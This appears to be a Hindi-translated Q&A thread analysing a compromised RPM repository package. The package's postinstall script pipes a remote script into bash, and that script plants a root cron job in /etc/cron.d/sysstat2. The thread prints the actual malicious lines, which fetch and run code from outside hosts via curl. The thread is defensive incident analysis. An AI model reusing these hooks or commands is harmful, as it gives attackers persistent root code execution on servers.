इस RPM को स्थापित करने से फ़ाइल कैसे बनाई जाती है?

रनिंग yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpmबनाता है, /etc/cron.d/sysstat2लेकिन RPM फ़ाइल को हटा देता है:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

RPM ने फ़ाइल कैसे बनाई और मैंने यह कैसे देखा कि उसने और क्या किया?

# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php शामिल हैं:

#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2

आपको पता चला कि आरपीएम की स्क्रिप्ट इंटरनेट से एक स्क्रिप्ट चलाती है, और वर्तमान में वह स्क्रिप्ट मालवेयर हो सकती है। हालाँकि, मुझे ऐसा पेलोड नहीं मिल रहा है जो कुछ भी करता हो।

आरपीएम पूरी तरह से ट्रैक नहीं कर सकता कि क्या हुआ क्योंकि यह एक मनमाना स्क्रिप्ट चला रहा है।

gpgcheck आपकी मदद नहीं करेगा, getpagespeed-extras-7-6.el7.gps.noarch.rpmऔर getpagespeed-extras-release-7-1.el7.gps.noarch.rpmआपके द्वारा जुड़े दोनों ही मान्य हस्ताक्षर हैं:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub  2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub  2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

रेपो मालिक से शिकायत करें कि पैकेज इंटरनेट से मनमाना कोड चलाता है। यदि ऐसा करना चाहिए, तो उनकी सॉफ़्टवेयर आपूर्ति श्रृंखला सुरक्षा में सुधार की आवश्यकता है।

यह इंटरनेट एक्सेस के बिना सॉफ़्टवेयर की पहली इंस्टॉल करने के लिए थोड़ा पागल लगता है, या मैन्युअल रूप से "पोस्ट इंस्टॉल" स्क्रिप्ट का निरीक्षण करता है। लेकिन दुर्भाग्य से लगभग आवश्यक प्रतीत होता है अगर पैकेज इस तरह से गलत सलाह देते हैं।

मेरे पास 5 CLoudLinux / cPanel सर्वर हैं, जिनका उपयोग Engintron के माध्यम से उन पर Nginx करता था, लेकिन वे अब इसके बजाय LiteSpeed ​​वेबसर्वर चलाते हैं। मुझे लगता है कि जब यह अनइंस्टॉल किया गया था, तो एंजिनट्रॉन ने पन्नों के रिपोज को पीछे छोड़ दिया हो सकता है। cPanel हर रात एक अद्यतन जाँच चलाता है, और लगभग आधी रात को मेरे सभी सर्वरों ने मुझे एक ई-मेल रिपोर्टिंग भेजी:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

पेलोड साइट की खोज ने मुझे यहां पहुंचाया जहां मैं देखता हूं कि उसी दिन आपके पास भी यही मुद्दा था। तो मेरी जानकारी को अपने में जोड़ने के लिए। /etc/cron.d/sysstat2मेरे सभी सर्वर पर एक ही फाइल मौजूद थी।

मैंने फ़ाइल को हटा दिया, रिपॉजिट को हटा दिया, और समस्या को रिपोर्ट करने के लिए GetPageSpeed ​​पर संपर्क फ़ॉर्म का उपयोग किया। रेपो का मालिक AWOL हो सकता है क्योंकि एक ब्लॉग पोस्ट में कहा गया था कि वह स्वास्थ्य समस्याओं के कारण रेपो को बंद कर रहा था। इसलिए हो सकता है कि हमलावर ने या तो इस तथ्य का फायदा उठाया कि रेपो पर ध्यान नहीं दिया जा रहा है, या शोषण के लिए एक खुला दरवाजा मिल गया है।